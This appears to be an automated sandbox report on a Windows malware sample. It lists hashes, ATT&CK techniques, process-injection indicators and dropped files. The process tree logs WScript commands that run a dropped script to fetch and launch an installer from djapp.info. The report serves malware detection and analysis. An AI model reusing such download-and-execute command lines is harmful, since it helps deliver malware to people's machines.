0c7538a10638b146d638d440e86e264ef7b6070efce97f1d07886a43c2078abb

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
04/06/2024, 18:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe
Size

184KB
MD5

95ea46ab8eb07da6eac0319ab27699b4
SHA1

308a221a64df731bc53eacb6d6d2780f69003dfb
SHA256

0c7538a10638b146d638d440e86e264ef7b6070efce97f1d07886a43c2078abb
SHA512

331814c2b762931ab6dd2c8cc21259a642cd27926ea10c1d10cfe39141f23db6786a3391fb38ef26b17dba4a9354171c1ea3165e3fa9598b47f6e9cb3d7ccc37
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3f:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1336	WScript.exe
8	1336	WScript.exe
10	1336	WScript.exe
12	2520	WScript.exe
13	2520	WScript.exe
15	2860	WScript.exe
16	2860	WScript.exe
18	276	WScript.exe
19	276	WScript.exe
21	1912	WScript.exe
22	1912	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 1336	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	28
PID 2084 wrote to memory of 1336	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	28
PID 2084 wrote to memory of 1336	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	28
PID 2084 wrote to memory of 1336	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2520	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2520	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2520	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2520	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	30
PID 2084 wrote to memory of 2860	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	32
PID 2084 wrote to memory of 2860	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	32
PID 2084 wrote to memory of 2860	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	32
PID 2084 wrote to memory of 2860	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	32
PID 2084 wrote to memory of 276	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	34
PID 2084 wrote to memory of 276	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	34
PID 2084 wrote to memory of 276	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	34
PID 2084 wrote to memory of 276	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	34
PID 2084 wrote to memory of 1912	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	36
PID 2084 wrote to memory of 1912	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	36
PID 2084 wrote to memory of 1912	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	36
PID 2084 wrote to memory of 1912	2084	95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
  2⤵
  - Blocklisted process makes network request
  PID:1336
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
  2⤵
  - Blocklisted process makes network request
  PID:2520
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
  2⤵
  - Blocklisted process makes network request
  PID:2860
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
  2⤵
  - Blocklisted process makes network request
  PID:276
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
  2⤵
  - Blocklisted process makes network request
  PID:1912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
493936daab236ff01eddcad61725cd7b

SHA1
77b9225f2e92feae8ab10eff979d7f2986a107a8

SHA256
2a626183018a8d4b572c01fe5eb0bcb82d8b36b74694c7cb9ae47735b19ff92b

SHA512
d73f9f2f7b223a1a368771c45ed6eb7c02fd5386f6c2594edc94f646094f8aca758c81b1656bf7a1ff72f8e171b8b50bb5a2183d08113705c6fa7a2ae710960f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
cd24833c9eecd6d04408050bc37a34a8

SHA1
d867ccdb45df9a05d896779010cd493a35706066

SHA256
62ee4eab70c7e4f5364127545402a2fb18b536916749a080accc90c120820de3

SHA512
54c48508c346276ad770fa1a3476c929ecd956d011a7fdc3de00424685611941fdfb8f8cf1535abfb569ac353f49737d1f797ce63a41063adca0ea35152a30e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e341cddb8b88404d24a904f93f117f1f

SHA1
7a01ae678e75369b84aac8e5c31854a9fb7b4a3d

SHA256
113bd85fb7be9f2009cceb0ce2c49b0c55170c9c050b0f86ce068cbaa8a0b451

SHA512
e67894e695721432f8a5af5e687d1692426a0ffec7f7e693b2da03ad59619ba1ef331c89cecffe42b9f94ad127edaa44941c5d33b0e4635a41203ac2a2b83e16

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
c8a37cb9f68b27652a885e92298b01d5

SHA1
78047961d08d9818113909e59535f806416bf2ca

SHA256
8a48a9c311f1495d28fbd3d7ae44cffd76d096546d1825f4a7b3a267e73c4cbc

SHA512
e82ce96b47e24ec757c948ead8baa238688d2929dd117374db603e80b9bb7ac1e52f8d08ad991f66f122942657b1d36b20b3ad24aeb4e63edd1c99a106e4e8ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
40KB

MD5
93872aeacb36cbc943a349f49e44b6ea

SHA1
27a994618a4664e9eb997f424e86fb0aca7681ec

SHA256
b1617e14dcef30f349bde4d875f0e8f246cb6da5ae0eae88f61bcba1a7a2483f

SHA512
cf2bd413f67e35b72efe4bd2095b7108a826c81e62bbbfb4486f4d58af00852cd109f0da935ba65c6e0f97f752a8411a69d1cf0b4914e742090609085a747dbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
6KB

MD5
2b872cc953ac32e1786620d2476f0171

SHA1
5865e7afaae9a3d975b302043357930c391ed418

SHA256
1c58dfd1a9264e6275594e1a75f1679e992e775c04d14025ab7d5c97f180be04

SHA512
ec814911fe3e569e73ae420e8b2dc1c80eae50a553bdc2d94a55465dbc4594dd68f232b20ee3c763655519c53824aaedf5161251ed43060e632df0c0fdbcaa9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

Filesize
6KB

MD5
8eaa37246e341e29d1c3bf9562356227

SHA1
611439291d378bee6083cb6151f841bed7ba845e

SHA256
043390c30382a7f2379d354f94b94a6ecc132c2183bdd663b8bafa2c53248683

SHA512
640b36e2161be6faffa52913138343496d13b475616c9754c2ca74e384361ad6a8eed53d72b88e333c592512780edcf211b2069701c60486506ab56fa3870950

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

Filesize
6KB

MD5
b4fade3dc06227dc888e8e376866f45d

SHA1
daaea5e297cb6e71943887866c8bd200b770417e

SHA256
c04d858776ccb2b4581a6d1a6f142aba583a9849ee56b95fc6f4586445589263

SHA512
faec2c5fd2178d29c65e9a4f052949f201f110fb7a3623fb724baadedf96ef45719e73aca3f0afefdc79e511b95f4087935fb4028c0e9c3abc0a2e891582b94a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab41F0.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5A70.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1304.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4BE9MGOJ.txt

Filesize
175B

MD5
84aed76d54d4c3c26528dc8792f3509e

SHA1
249503a0913b1b4db1ff1f58abd951321401bdd1

SHA256
344df8c609f293bf12df521b86b8c31b0a985524bf498e8ee71c29ddb53e434c

SHA512
f90a4d9840976236b39f5284e57bc52750d88530dc1a14a55219118c267c3b76a9a53cadae12db1fc40dd13a0fa224cc9affe467fd44eb918c69432bcbf6f858

Download Submit